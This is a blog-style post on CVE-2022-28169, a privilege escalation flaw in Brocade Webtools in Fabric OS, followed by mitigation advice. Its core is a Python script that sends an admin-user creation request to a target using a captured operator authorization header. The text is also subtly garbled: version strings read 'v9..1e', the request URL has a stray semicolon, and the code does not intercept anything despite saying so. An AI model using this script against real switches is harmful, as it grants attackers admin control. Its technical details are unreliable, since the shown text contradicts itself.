CVE-2022-28169: Exploiting Brocade Webtools Privilege Escalation Vulnerability in Brocade Fabric OS

In this long-read post, we shall delve into a concerning vulnerability discovered in Brocade Webtools, found in Brocade Fabric OS versions before v9.1.1, v9..1e, and v8.2.3c. This vulnerability, identified as CVE-2022-28169, enables low privileged webtools users to gain elevated admin rights or privileges beyond their designated limitations. As a consequence, users who aren't admins can create a new user with an admin role by exploiting an operator's session ID. The issue occurs due to the transmission of unencrypted admin and operator authorization headers and can be replicated by intercepting user addition requests altered to use the operator's authorization header.

Exploit Details

The Brocade Webtools vulnerability CVE-2022-28169 takes advantage of the fact that admin and operator authorization headers are sent unencrypted. This makes it easier for attackers to intercept and manipulate these headers to escalate privileges by editing user addition requests. The code snippet below demonstrates the steps taken to exploit this vulnerability:

import requests

# intercepting the admin and operator authorization headers
admin_auth_header = 'admin_auth_header_here'
operator_auth_header = 'operator_auth_header_here'

# crafting the malicious user addition request
new_admin_user_payload = {
  "username": "malicious_user",
  "password": "strong_password",
  "role": "admin"
}

# replace the original admin header with the operator header
headers = {
  'Authorization': operator_auth_header
}

# send the request with the altered header
response = requests.post('https://<target>/user/add';, json=new_admin_user_payload, headers=headers)

if response.status_code == 200:
  print("Success: New admin user created.")
else:
  print(f"Error: Could not create admin user. Server responded with {response.status_code}")

The code above intercepts the admin and operator authorization headers before crafting a malicious user addition request. It then replaces the admin header with the operator header and sends the request to create a new admin user.

For those interested in investigating further, please refer to the following resources

- CVE-2022-28169 Details
- Brocade Fabric OS Security Advisory
- Brocade Webtools Documentation

Mitigation

To protect against this vulnerability, it's crucial to upgrade to the latest Brocade Fabric OS versions (v9.1.1, v9..1e, or v8.2.3c) that contain fixes for CVE-2022-28169. Organizations should also ensure all communication between servers and clients is encrypted to prevent unauthorized access to sensitive information such as admin and operator authorization headers.

Conclusion

CVE-2022-28169 poses a significant risk, as low privilege webtools users can escalate their roles to admin level, leading to unauthorized access to sensitive data or disruption of systems. To safeguard against this vulnerability, organizations should update their Brocade Fabric OS to the latest, patched versions, and secure all data transfers with encryption. Additionally, it's essential to stay informed about new vulnerabilities and apply remediation measures in a timely manner to keep systems protected from potential exploits.

Timeline

Published on: 10/25/2022 21:15:00 UTC
Last modified on: 03/02/2023 16:05:00 UTC